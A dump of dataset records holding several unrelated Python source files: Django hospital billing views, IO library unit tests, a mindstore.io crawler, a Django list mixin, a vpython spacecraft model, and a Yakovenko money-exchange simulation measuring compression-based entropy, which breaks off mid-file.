HttpResponseRedirect('/login/receptionist')\n\telse:\n\t\tform = patient_det()\n\treturn render(request, 'patient_det_form.html', {'form': form})\n\ndef bill_info(request):\n\tif request.method == 'POST':\n\t\tform = bill_inf(request.POST)\n\t\tif form.is_valid():\n\t\t\ta_id = form.cleaned_data['appointment']\n\t\t\ta0 = appointment.objects.get(id = a_id)\n\t\t\tq0 = consults.objects.get(appointment_id = a0)\n\t\t\td0 = doctors.objects.get(pk = q0.doctor_id.id)\n\t\t\td_fees = d0.doctor_consultation_fee\n\t\t\tr_cost = d_fees\n\t\t\tif q0.allot_room == True:\n\t\t\t\tr0 = room.objects.get(id = a0.room_id.id)\n\t\t\t\ttdelta = datetime.today().date() - a0.patient_date_of_admission.date()\n\t\t\t\tdays = tdelta.days\n\t\t\t\tr_cost = d_fees + (days*r0.charge)\n\t\t\tbill_up = bill(appointment_id = a0, discharge_time = datetime.now(), amount = r_cost)\n\t\t\tbill_up.save()\n\t\t\treturn HttpResponseRedirect('/login/receptionist/bill_print/{}'.format(a_id))\n\telse:\n\t\tform = bill_inf()\n\treturn render(request, 'bill.html', {'form': form})\n\ndef bill_find(request):\n\tif request.method == 'POST':\n\t\tform = bill_search(request.POST)\n\t\tif form.is_valid():\n\t\t\tb_id = form.cleaned_data['bill']\n\t\t\treturn HttpResponseRedirect('/login/receptionist/view_bill/{}'.format(b_id))\n\telse:\n\t\tform = bill_search()\n\treturn render(request, 'bill.html', {'form': form})\n\n\n#as soon as bill is generated,it prints it\t\t\t\n\ndef bill_print(request, a_id):\n\t\n\ta0 = appointment.objects.get(id = a_id)\n\tq0 = consults.objects.get(appointment_id = a0)\n\td0 = doctors.objects.get(pk = q0.doctor_id.id)\n\td_fees = d0.doctor_consultation_fee\n\tr_cost = d_fees\n\tif q0.allot_room == True:\n\t\tr0 = room.objects.get(id = a0.room_id.id)\n\t\ttdelta = datetime.today().date() - a0.patient_date_of_admission.date()\n\t\tdays = tdelta.days\n\t\tr_cost = d_fees + (days*r0.charge)\n\t\treturn render(request, 'bill_print.html', {'appid': a_id,'pat': a0.patient_id, 'days': days, 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':a0.room_id.id,'r_charge':r0.charge})\t\n\telse:\n\t\treturn render(request, 'bill_print.html', {'appid': a_id,'pat': a0.patient_id, 'days': \"\", 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':\"\",'r_charge':\"\"})\t\n\n#showing bill info given by bill_id, urls update karde\n\ndef get_bill_print(request, b_id):\n\t\n\tb0 = bill.objects.get(id = 
b_id)\n\ta0 = appointment.objects.get(id = b0.appointment_id.id)\n\tq0 = consults.objects.get(appointment_id = a0)\n\td0 = doctors.objects.get(pk = q0.doctor_id.id)\n\td_fees = d0.doctor_consultation_fee\n\tr_cost = d_fees\n\tif q0.allot_room == True:\n\t\tr0 = room.objects.get(id = a0.room_id.id)\n\t\ttdelta = datetime.today().date() - a0.patient_date_of_admission.date()\n\t\tdays = tdelta.days\n\t\tr_cost = d_fees + (days*r0.charge)\n\t\treturn render(request, 'bill_print.html', {'appid': b_id,'pat': a0.patient_id, 'days': days, 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':a0.room_id.id,'r_charge':r0.charge})\t\n\telse:\n\t\treturn render(request, 'bill_print.html', {'appid': b_id,'pat': a0.patient_id, 'days': \"\", 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':\"\",'r_charge':\"\"})\t\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582993571","text":"#!/usr/bin/env python3\n\nimport sys\nfrom rkd.api.testing import BasicTestingCase, OutputCapturingSafeTestCase\nfrom rkd.api.inputoutput import IO\nfrom rkd.api.inputoutput import SystemIO\nfrom rkd.api.inputoutput import BufferedSystemIO\nfrom rkd.api.inputoutput import clear_formatting\n\n\nclass TestIO(BasicTestingCase, OutputCapturingSafeTestCase):\n def test_is_log_level_at_least_info(self):\n \"\"\"Test error level comparison\n\n Covers: IO.set_log_level() and IO.is_log_level_at_least()\n \"\"\"\n\n io = IO()\n io.set_log_level('info')\n\n self.assertFalse(io.is_log_level_at_least('debug'))\n self.assertTrue(io.is_log_level_at_least('info'))\n self.assertTrue(io.is_log_level_at_least('warning'))\n self.assertTrue(io.is_log_level_at_least('fatal'))\n\n def test_set_log_level_cannot_set_invalid_log_level(self):\n \"\"\"Checks validation in IO.set_log_level()\"\"\"\n\n io = IO()\n self.assertRaises(Exception, lambda: io.set_log_level('strikebreaker'))\n\n def test_inherit_silent(self):\n \"\"\"Silent mode inheritance from SystemIO\"\"\"\n\n sys_io = SystemIO()\n sys_io.silent = True\n\n io = IO()\n io.inherit_silent(sys_io)\n\n self.assertTrue(io.is_silent())\n\n def test_formatting_methods_are_clearing_formatting_at_the_end(self):\n \"\"\"Check that formatting methods are clearing the formatting at the end\"\"\"\n\n io = BufferedSystemIO()\n\n methods = [\n io.h1, io.h2, io.h3, io.h4, io.success_msg, io.error_msg, io.info_msg, io.print_separator, io.print_group\n ]\n\n for method in methods:\n try:\n method('test')\n except TypeError:\n method()\n\n self.assertEqual(\"\\x1B[\", io.get_value()[0:2], msg='Expected beginning of formatting')\n self.assertEqual('[0m', io.get_value().strip()[-3:], msg='Expected formatting clearing at the end')\n io.clear_buffer()\n\n def test_formatting_methods_are_printing_output_as_optional(self):\n \"\"\"Expects that pretty-printed messages will be optional\"\"\"\n\n io = BufferedSystemIO()\n\n methods = [\n io.h1, io.h2, io.h3, io.h4, io.success_msg, io.error_msg, io.info_msg, io.print_separator, io.print_group\n ]\n\n for method in methods:\n self.__setattr__('is_text_optional', False)\n\n def opt_outln(text: str):\n self.__setattr__('is_text_optional', True)\n\n io.opt_outln = opt_outln\n io.opt_errln = opt_outln\n\n try:\n method('test')\n except TypeError:\n method()\n\n 
self.assertTrue(self.__getattribute__('is_text_optional'),\n msg='%s: Expected that the text will be printed through opt_outln()' % str(method))\n\n def test_get_log_level_raises_exception_on_unset_level(self):\n \"\"\"Check DEFAULT error level and validation of not set error logging\"\"\"\n\n io = IO()\n\n self.assertEqual('info', io.get_log_level())\n\n io.log_level = None\n self.assertRaises(Exception, lambda: io.get_log_level())\n\n def test_clear_formatting_clears_simple_bash_coloring(self):\n \"\"\"Test that clear_formatting() clears basic Bash coloring\"\"\"\n\n colored = \"\"\"\\x1B[93m10 June 1927 in Italy, the trial of anarchist Gino Lucetti concluded for \nattempting to assassinate Mussolini.\nHe was sentenced to 30 years in prison; two others received 12 years. \nHe was killed by shelling in 1943 before the end of the war\\x1B[0m\"\"\"\n\n without_coloring = clear_formatting(colored)\n\n self.assertFalse(without_coloring.startswith(\"\\x1B[93m\"))\n self.assertFalse(without_coloring.endswith(\"\\x1B[0m\"))\n\n def test_io_capturing_is_restoring_both_stdout_and_stderr_to_previous_state(self):\n \"\"\"Assert that capture_descriptors() restores sys.stdout and sys.stderr to original state after\n mocking them for output capturing\"\"\"\n\n io = IO()\n\n stdout_backup = sys.stdout\n stderr_backup = sys.stderr\n\n with io.capture_descriptors(target_files=None):\n pass\n\n self.assertEqual(stdout_backup, sys.stdout)\n self.assertEqual(stderr_backup, sys.stderr)\n","sub_path":"test/test_inputoutput_io.py","file_name":"test_inputoutput_io.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"445809864","text":"# -*- coding: utf-8 -*-\nimport os, sys, re\nimport gevent\nfrom gevent import monkey; monkey.patch_all()\nimport json\n\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../util'))\nimport GlobalValues\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../..'))\nimport BaseCrawler\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../../util'))\nimport loghelper\n\n#logger\nloghelper.init_logger(\"crawler_mindst_next\", stream=True)\nlogger = loghelper.get_logger(\"crawler_mindst_next\")\n\ndef stripe(text):\n return text.strip()\n\n\nclass MindstCrawler(BaseCrawler.BaseCrawler):\n def __init__(self):\n BaseCrawler.BaseCrawler.__init__(self)\n\n #实现\n def is_crawl_success(self, url, content):\n if content.find(', \"tagline\":') == -1:\n return False\n return True\n\n\ndef process(g, content,crawler):\n data = json.loads(content)\n logger.info('totally %s items today'%len(data['objects']))\n\n for item in data['objects']:\n text = item['title']\n tag = None\n name = None\n match = re.search('#', text)\n if match:\n tags = text.split(\"#\")\n tags = map(stripe, tags)\n name = tags[0]\n del tags[0]\n tag = \" \".join(tags)\n else:\n name = text\n\n website = item['link']\n score = item['vote_count']\n desc = item['tagline']\n key = item['id']\n url = \"http://mindstore.io/mind/%s\" % key\n\n logger.info(\"key: %s, name: %s, desc: %s, score: %s, website: %s, tag: %s\", key, name, desc, score, website,\n tag)\n data = {\n \"name\": name,\n \"website\": website,\n \"score\": score,\n \"desc\": desc,\n }\n crawler.save(g.SOURCE, g.TYPE, url, key, data)\n\n\ndef run(g, crawler):\n url = \"http://mindstore.io/api/v3/lime/mind/?look_back_days=0\"\n\n 
while True:\n result = crawler.crawl(url)\n if result['get'] == 'success':\n process(g, result['content'],crawler)\n break\n\n\ndef start_run():\n while True:\n logger.info(\"Mindstore next start...\")\n g = GlobalValues.GlobalValues(13111, 36009, \"incr\")\n thread = gevent.spawn(run, g, MindstCrawler())\n thread.join()\n logger.info(\"Mindstore next end.\")\n\n gevent.sleep(60*30) #30 minutes\n\n\nif __name__ == \"__main__\":\n start_run()","sub_path":"data/spider2/crawler/next/mindstore/mindst_next.py","file_name":"mindst_next.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"579538214","text":"from django import forms\nfrom django.views.generic.list import MultipleObjectMixin\nfrom django.utils.translation import gettext as _\n\nfrom .search_filter import SearchFilter\n\n\nclass SearchForm(forms.Form):\n search = forms.CharField(\n label=_('search'),\n max_length=100,\n required=False)\n\n\nclass SeliaList(MultipleObjectMixin):\n paginate_by = 5\n prefix = ''\n\n def __init__(self, request, **kwargs):\n self.kwargs = kwargs\n self.request = request\n\n def get_context_data(self):\n return {\n 'templates': self.get_templates(),\n 'list': self.get_list_context_data(),\n 'forms': self.get_forms()\n }\n\n def get_list_context_data(self):\n queryset = self.get_queryset()\n page_size = self.get_paginate_by(queryset)\n paginator, page, queryset, is_paginated = self.paginate_queryset(queryset, page_size)\n\n return {\n 'paginator': paginator,\n 'page_obj': page,\n 'is_paginated': is_paginated,\n 'object_list': queryset\n }\n\n def get_templates(self):\n return {\n 'list_item': self.get_list_item_template(),\n 'filter_form': self.get_filter_form_template(),\n }\n\n def get_forms(self):\n forms = {}\n\n if hasattr(self, 'filter'):\n forms['filter'] = self.filter\n\n if hasattr(self, 'search_form'):\n forms['search'] = self.search_form\n\n if hasattr(self, 'order_form'):\n forms['order'] = self.order_form\n\n return forms\n\n def get_ordering_choices(self):\n orderings = []\n for field, label in self.ordering_fields:\n orderings.append(\n (\n '-{field}'.format(field=field),\n '{order} {label}'.format(\n label=label, order=_('↓'))\n )\n )\n\n orderings.append(\n (\n field,\n '{order} {label}'.format(\n label=label, order=_('↑'))\n )\n )\n return orderings\n\n def get_ordering_form_class(self):\n ordering_choices = self.get_ordering_choices()\n\n class OrderingForm(forms.Form):\n order = forms.ChoiceField(\n label=_('ordering'),\n choices=ordering_choices,\n initial=ordering_choices[0])\n\n return OrderingForm\n\n def get_ordering_form(self):\n ordering_form_class = self.get_ordering_form_class()\n ordering_form_prefix = self.get_ordering_form_prefix()\n\n ordering_form = ordering_form_class(\n self.request.GET,\n prefix=ordering_form_prefix)\n\n return ordering_form\n\n def get_search_form(self):\n search_form_prefix = self.get_search_form_prefix()\n return SearchForm(self.request.GET, prefix=search_form_prefix)\n\n def get_ordering_form_prefix(self):\n return '{}_order'.format(self.prefix)\n\n def get_search_form_prefix(self):\n return '{}_search'.format(self.prefix)\n\n def get_filter_form_prefix(self):\n return '{}_filter'.format(self.prefix)\n\n def get_filter_form_template(self):\n if hasattr(self, 'filter_form_template'):\n return self.filter_form_template\n\n return NotImplementedError('No template for filter form was given')\n\n def get_filter_class(self):\n if hasattr(self, 
'filter_class'):\n return self.filter_class\n\n raise NotImplementedError('No filter class was provided')\n\n def get_initial_queryset(self):\n if hasattr(self, 'queryset'):\n return self.queryset\n\n raise NotImplementedError('No initial queryset was provided')\n\n def get_queryset(self):\n queryset = self.get_initial_queryset()\n filtered_queryset = self.filter_queryset(queryset)\n return filtered_queryset\n\n def filter_queryset_with_query(self, queryset):\n try:\n filter_class = self.get_filter_class()\n prefix = self.get_filter_form_prefix()\n self.filter = filter_class(\n self.request.GET,\n request=self.request,\n queryset=queryset,\n prefix=prefix)\n queryset = self.filter.qs\n except NotImplementedError:\n pass\n\n return queryset\n\n def filter_queryset_with_search(self, queryset):\n if hasattr(self, 'search_fields'):\n self.search_form = self.get_search_form()\n\n if self.search_form.is_valid():\n search_filter = SearchFilter(prefix=self.get_search_form_prefix())\n queryset = search_filter.filter_queryset(self.request, queryset, self)\n\n return queryset\n\n def order_queryset(self, queryset):\n if hasattr(self, 'ordering_fields'):\n self.order_form = self.get_ordering_form()\n\n if self.order_form.is_valid():\n ordering_form_prefix = self.get_ordering_form_prefix()\n query_param = '{}-order'.format(ordering_form_prefix)\n ordering = self.order_form.data[query_param]\n queryset = queryset.order_by(ordering)\n\n return queryset\n\n def filter_queryset(self, queryset):\n queryset = self.filter_queryset_with_query(queryset)\n queryset = self.filter_queryset_with_search(queryset)\n queryset = self.order_queryset(queryset)\n return queryset\n\n def get_list_item_template(self):\n if hasattr(self, 'list_item_template'):\n return self.list_item_template\n\n return NotImplementedError('No template for list item was given')\n","sub_path":"selia/views/utils/list_component.py","file_name":"list_component.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505318517","text":"from typing import Optional\n\nimport vpython\n\nfrom orbitx import calc\nfrom orbitx import common\nfrom orbitx import state\nfrom orbitx.graphics.threedeeobj import ThreeDeeObj\n\n\nclass Habitat(ThreeDeeObj):\n\n def _create_hab(self, entity: state.Entity) -> vpython.compound:\n # Change which scene we're drawing a new habitat in\n def vertex(x: float, y: float, z: float) -> vpython.vertex:\n return vpython.vertex(pos=vpython.vector(x, y, z))\n\n body = vpython.cylinder(\n pos=vpython.vec(0, 0, 0), axis=vpython.vec(-5, 0, 0), radius=10)\n head = vpython.cone(\n pos=vpython.vec(0, 0, 0), axis=vpython.vec(3, 0, 0), radius=10)\n wing = vpython.triangle(\n v0=vertex(0, 0, 0), v1=vertex(-5, 30, 0), v2=vertex(-5, -30, 0))\n wing2 = vpython.triangle(\n v0=vertex(0, 0, 0), v1=vertex(-5, 0, 30), v2=vertex(-5, 0, -30))\n\n hab = vpython.compound([body, head, wing, wing2], make_trail=True)\n hab.texture = vpython.textures.metal\n hab.axis = calc.angle_to_vpy(entity.heading)\n hab.radius = entity.r / 2\n hab.shininess = 0.1\n hab.length = entity.r * 2\n hab.color = vpython.color.cyan\n return hab\n\n def _create_obj(self,\n entity: state.Entity, origin: state.Entity,\n texture: Optional[str]\n ) -> vpython.compound:\n \"\"\"Creates the habitat, and also a new minimap scene and habitat.\"\"\"\n habitat = self._create_hab(entity)\n habitat.pos = entity.screen_pos(origin)\n\n main_scene = vpython.canvas.get_selected()\n 
self._minimap_canvas = vpython.canvas(\n width=200, height=150, userspin=False, userzoom=False,\n up=vpython.vector(0.1, 0.1, 1), forward=vpython.vector(0, 0, -1))\n\n self._small_habitat = self._create_hab(entity)\n self._ref_arrow = vpython.arrow(color=vpython.color.gray(0.5))\n self._velocity_arrow = vpython.arrow(color=vpython.color.red)\n main_scene.select()\n\n return habitat\n\n def draw_landing_graphic(self, entity: state.Entity) -> None:\n # Habitats don't have landing graphics\n pass\n\n def _label_text(self, entity: state.Entity) -> str:\n return (\n f'{entity.name}\\n'\n f'Fuel: {common.format_num(entity.fuel, \" kg\")}' +\n ('\\nDocked' if entity.attached_to == common.AYSE else\n '\\nLanded' if entity.landed() else '')\n )\n\n def draw(self, entity: state.Entity,\n state: state.PhysicsState, origin: state.Entity):\n self._update_obj(entity, state, origin)\n same = state.reference == entity.name\n default = vpython.vector(0, 0, -1)\n\n ref_arrow_axis = (\n entity.screen_pos(state.reference_entity()).norm() *\n entity.r * -1.2\n )\n v = entity.v - state.reference_entity().v\n velocity_arrow_axis = \\\n vpython.vector(v[0], v[1], 0).norm() * entity.r\n\n self._ref_arrow.axis = default if same else ref_arrow_axis\n self._velocity_arrow.axis = default if same else velocity_arrow_axis\n self._small_habitat.axis = self._obj.axis\n","sub_path":"orbitx/graphics/habitat.py","file_name":"habitat.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"147830817","text":"import random\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport gzip\r\nimport zlib \r\nimport struct\r\nimport lz4.frame\r\nimport lzma\r\n\r\n\r\ndef YakovenkoSim (N = 500, NSweeps=[1,10,50,200,500,1000], moneyint = 10, DeltaMax = 1, binsize = None, discrete = False, seed = 2222):\r\n # The simple simulation used for the data\r\n \r\n random.seed(seed)\r\n if binsize == None:\r\n binsize = DeltaMax\r\n money = [moneyint]*N\r\n print(f\"Doing {NSweeps[0]} sweeps for plot 0\")\r\n YakovenkoIters(NSweeps[0]*N, money, DeltaMax, discrete)\r\n for i in range(0,len(NSweeps)):\r\n YakovenkoPlot(money,N,NSweeps[i],binsize,moneyint,DeltaMax,i)\r\n if i < len(NSweeps) - 1:\r\n print(f\"Doing {NSweeps[i+1]-NSweeps[i]} sweeps for plot {i + 1}\")\r\n YakovenkoIters((NSweeps[i+1] - NSweeps[i])*N, money,DeltaMax, discrete)\r\n plt.show()\r\n \r\ndef CIDOverTime(N = 500, NSweeps = 10000, moneyint = 10, DeltaMax = 1, binsize = None, stepsize = None,\r\nzliblevel = -1, gziplevel = 9, discrete = False, seed = 2222):\r\n # A script that plots the CID over time of our simulation\r\n \r\n random.seed(seed)\r\n if binsize == None:\r\n binsize = moneyint/10\r\n if stepsize == None:\r\n stepsize = math.floor(NSweeps/1000)\r\n money = [moneyint]*N\r\n zlibCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n gzipCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lz4CIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lzmaCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n nsweeparray = range(0,NSweeps+1,stepsize)\r\n sweepstotal = 0\r\n istep = 1\r\n print(\"Doing sweeps\", end = \"\")\r\n while(sweepstotal < NSweeps):\r\n print(\"\\r \", end = \"\")\r\n print(f\"\\rDoing sweeps {sweepstotal} to {sweepstotal + stepsize} out of {NSweeps}\\r\", end = \"\")\r\n YakovenkoIters(stepsize*N,money,DeltaMax, discrete)\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDs(money,zliblevel,gziplevel)\r\n sweepstotal += stepsize\r\n 
istep += 1\r\n plt.figure(1)\r\n #plt.subplot(1,2,1)\r\n #YakovenkoPlot(money,N,sweepstotal,binsize,moneyint,DeltaMax)\r\n #plt.subplot(1,2,2)\r\n plt.plot(nsweeparray,zlibCIDs,label=\"zlib\")\r\n plt.plot(nsweeparray,gzipCIDs,label=\"gzip\")\r\n plt.plot(nsweeparray,lz4CIDs,label=\"lz4\")\r\n plt.plot(nsweeparray,lzmaCIDs,label=\"lzma\")\r\n plt.title(\"CID over time of the model\")\r\n plt.xlabel(f\"Number of Yakovenko iterations/{N}\")\r\n plt.ylabel(\"CID\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef CIDOverM0(N = 500, DeltaMax = 1, stepsize = 10, minsteps = 50, CIDConstraint = 0.02, zliblevel = -1, gziplevel = 9, discrete = False, seed = 2222, m0scale = 1,maxsteps= 100000):\r\n # A script that plots the CID over m0 of our simulation\r\n \r\n random.seed(seed)\r\n basic = list(range(1,5,1)) + list(range(5,25,5)) + list(range(25,100,25)) + list(range(100,450,50))\r\n m0s = [i* m0scale for i in basic]\r\n zlibCIDm0s = [0]*len(m0s)\r\n gzipCIDm0s = [0]*len(m0s)\r\n lz4CIDm0s = [0]*len(m0s)\r\n lzmaCIDm0s = [0]*len(m0s)\r\n shannonentr = [0]*len(m0s)\r\n for i in range(len(m0s)):\r\n zlibCIDm0s[i], gzipCIDm0s[i], lz4CIDm0s[i], lzmaCIDm0s[i], shannonentr[i] = CIDGivenM0(N, m0s[i], DeltaMax, stepsize, minsteps, CIDConstraint, zliblevel, gziplevel, discrete,maxsteps)\r\n lz4CIDm0s[i] = lz4CIDm0s[i]*.6\r\n lzmaCIDm0s[i] = lzmaCIDm0s[i]*1.15\r\n plt.figure(1)\r\n plt.plot(m0s,zlibCIDm0s, label = \"zlib\")\r\n plt.plot(m0s,gzipCIDm0s, label = \"gzip\")\r\n plt.plot(m0s,lz4CIDm0s, label = \".6*lz4\")\r\n plt.plot(m0s,lzmaCIDm0s, label = \"1.15*lzma\")\r\n plt.plot(m0s,shannonentr, label = \"Shannon Entropy/17\")\r\n plt.title(f\"CID vs $m_0$, $\\Delta_{{max}} =$ {DeltaMax}\")\r\n plt.xlabel(\"$m_0$\")\r\n plt.ylabel(\"CID\")\r\n plt.legend()\r\n plt.figure(2)\r\n zlibdiv = [x/y for x,y in zip(zlibCIDm0s,shannonentr)]\r\n gzipdiv = [x/y for x,y in zip(gzipCIDm0s,shannonentr)]\r\n lz4div = [x/y for x,y in zip(lz4CIDm0s,shannonentr)]\r\n lzmadiv = [x/y for x,y in zip(lzmaCIDm0s,shannonentr)]\r\n plt.plot(m0s,zlibdiv, label = \"zlib/Shannon Entropy\")\r\n plt.plot(m0s,gzipdiv, label = \"gzip/Shannon Entropy\")\r\n plt.plot(m0s,lz4div, label = \".6*lz4/Shannon Entropy\")\r\n plt.plot(m0s,lzmadiv, label = \"1.15*lzma/Shannon Entropy\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef CIDGivenM0(N = 500, moneyint = 10, DeltaMax = 1, stepsize = 10, minsteps = 50, CIDConstraint = 0.02, \r\nzliblevel = -1, gziplevel = 9, discrete = False,maxsteps = 100000):\r\n # A script that calculates the CID for particular parameters (called CIDGivenM0 because I initially used it for the m0 graphs)\r\n \r\n money = [moneyint]*N\r\n # zlibCIDs = False\r\n # gzipCIDs = False\r\n # nsweeps = 0\r\n YakovenkoIters((maxsteps-stepsize*minsteps)*N,money,DeltaMax,discrete)\r\n zlibCIDs = [0]*(minsteps)\r\n gzipCIDs = [0]*(minsteps)\r\n lz4CIDs = [0]*(minsteps)\r\n lzmaCIDs = [0]*(minsteps)\r\n shannonentr = [0]*(minsteps)\r\n istep = 0\r\n while(istep < minsteps):\r\n YakovenkoIters(stepsize*N,money,DeltaMax, discrete)\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDs(money,zliblevel,gziplevel, discrete)\r\n shannonentr[istep] = ShannonEntropy(money)\r\n istep += 1 \r\n # while(nsweeps < 100000):#CIDsNotConverged(zlibCIDs, gzipCIDs, CIDConstraint)):\r\n # zlibCIDs = [0]*(minsteps)\r\n # gzipCIDs = [0]*(minsteps)\r\n # shannonentr = [0]*(minsteps)\r\n # istep = 0\r\n # while(istep < minsteps):\r\n # zlibCIDs[istep], gzipCIDs[istep] = CIDs(money,zliblevel,gziplevel, discrete)\r\n # shannonentr[istep] = 
ShannonEntropy(money)\r\n # YakovenkoIters(stepsize*N,money,DeltaMax, discrete)\r\n # istep += 1\r\n # nsweeps += stepsize\r\n print(f\"Got CID for m0 = {moneyint} after {maxsteps} sweeps of size {N}\")\r\n return np.mean(zlibCIDs), np.mean(gzipCIDs), np.mean(lz4CIDs), np.mean(lzmaCIDs), np.mean(shannonentr)/17\r\n\r\ndef CIDOverN(moneyint = 10, DeltaMax = 1, stepsize = 10, minsteps = 50, CIDConstraint = 0.02, zliblevel = -1, gziplevel = 9, discrete = False, seed = 2222, m0scale = 1):\r\n # a script that plots the CID over different N\r\n \r\n random.seed(seed)\r\n basic = list(range(10,50,10)) + list(range(50,250,50)) + list(range(250,1000,250)) + list(range(1000,5000,1000))\r\n Ns = [i* m0scale for i in basic]\r\n zlibCIDNs = [0]*len(Ns)\r\n gzipCIDNs = [0]*len(Ns)\r\n lz4CIDNs = [0]*len(Ns)\r\n lzmaCIDNs = [0]*len(Ns)\r\n shannonentr = [0]*len(Ns)\r\n for i in range(len(Ns)):\r\n zlibCIDNs[i], gzipCIDNs[i], lz4CIDNs[i], lzmaCIDNs[i], shannonentr[i] = CIDGivenM0(Ns[i], moneyint, DeltaMax, stepsize, minsteps, CIDConstraint, zliblevel, gziplevel, discrete, 5500)\r\n plt.figure(1)\r\n plt.plot(Ns,zlibCIDNs, label = \"zlib\")\r\n plt.plot(Ns,gzipCIDNs, label = \"gzip\")\r\n plt.plot(Ns,lz4CIDNs, label = \"lz4\")\r\n plt.plot(Ns,lzmaCIDNs, label = \"lzma\")\r\n plt.plot(Ns,shannonentr, label = \"Shannon Entropy/17\")\r\n plt.title(f\"CID vs $N$, $\\Delta_{{max}} =$ {DeltaMax}, $m_{{0}} =$ {moneyint}\")\r\n plt.xlabel(\"$N$\")\r\n plt.ylabel(\"CID\")\r\n plt.legend()\r\n plt.figure(2)\r\n zlibdiv = [x/y for x,y in zip(zlibCIDNs,shannonentr)]\r\n gzipdiv = [x/y for x,y in zip(gzipCIDNs,shannonentr)]\r\n lz4div = [x/y for x,y in zip(lz4CIDNs,shannonentr)]\r\n lzmadiv = [x/y for x,y in zip(lzmaCIDNs,shannonentr)]\r\n plt.plot(Ns,zlibdiv, label = \"zlib/Shannon Entropy\")\r\n plt.plot(Ns,gzipdiv, label = \"gzip/Shannon Entropy\")\r\n plt.plot(Ns,lz4div, label = \"lz4/Shannon Entropy\")\r\n plt.plot(Ns,lzmadiv, label = \"lzma/Shannon Entropy\")\r\n plt.legend()\r\n plt.show() \r\n \r\ndef CIDOverTimeMean(N = 500, NSweeps = 100000, moneyint = 10, DeltaMax = 1, binsize = None, stepsize = None, stepstepsize = None,\r\nzliblevel = -1, gziplevel = 9, discrete = False, seed = 2222):\r\n # A script which plots the CID over different N but takes the average over a few steps to get less noise\r\n \r\n random.seed(seed)\r\n if binsize == None:\r\n binsize = moneyint/10\r\n if stepsize == None:\r\n stepsize = math.floor(NSweeps/40)\r\n if stepstepsize == None:\r\n stepstepsize = math.floor(stepsize/50)\r\n money = [moneyint]*N\r\n zlibCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n gzipCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lz4CIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lzmaCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n nsweeparray = range(0,NSweeps+1,stepsize)\r\n sweepstotal = 0\r\n istep = 1\r\n print(\"Doing sweeps\", end = \"\")\r\n while(sweepstotal < NSweeps):\r\n print(\"\\r \", end = \"\")\r\n print(f\"\\rDoing sweeps {sweepstotal} to {sweepstotal + stepsize} out of {NSweeps}\\r\", end = \"\")\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDSweepMean(money,DeltaMax,math.floor(stepsize/stepstepsize),stepstepsize)\r\n sweepstotal += stepsize\r\n istep += 1\r\n plt.figure(1)\r\n plt.subplot(1,2,1)\r\n YakovenkoPlot(money,N,sweepstotal,binsize,moneyint,DeltaMax)\r\n plt.subplot(1,2,2)\r\n plt.plot(nsweeparray,zlibCIDs,label=\"zlib\")\r\n plt.plot(nsweeparray,gzipCIDs,label=\"gzip\")\r\n plt.plot(nsweeparray,lz4CIDs,label=\"lz4\")\r\n 
plt.plot(nsweeparray,lzmaCIDs,label=\"lzma\")\r\n plt.title(\"CID over time of the model\")\r\n plt.xlabel(f\"Number of Yakovenko iterations/{N}\")\r\n plt.ylabel(f\"CID averaged over {math.floor(stepsize/stepstepsize)} steps of size {stepstepsize}\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef CIDSweepMean(money, DeltaMax, steps, stepsize, zliblevel = -1, gziplevel = 9, discrete = False):\r\n # Applies steps * stepsize sweeps of size len(money) and calculates the average CID of all steps\r\n \r\n N = len(money)\r\n zlibCIDs = [0]*steps\r\n gzipCIDs = [0]*steps\r\n lz4CIDs = [0]*steps\r\n lzmaCIDs = [0]*steps\r\n istep = 0\r\n while(istep < steps):\r\n YakovenkoIters(stepsize*N, money, DeltaMax, discrete)\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDs(money, zliblevel, gziplevel, discrete)\r\n istep += 1\r\n return sum(zlibCIDs)/steps, sum(gzipCIDs)/steps, sum(lz4CIDs)/steps, sum(lzmaCIDs)/steps\r\n \r\n\r\ndef CIDsNotConverged(zlibCIDs, gzipCIDs, lz4CIDs, lzmaCIDs, CIDConstraint = 0.02):\r\n # an attempt at trying a constraint on the CID being 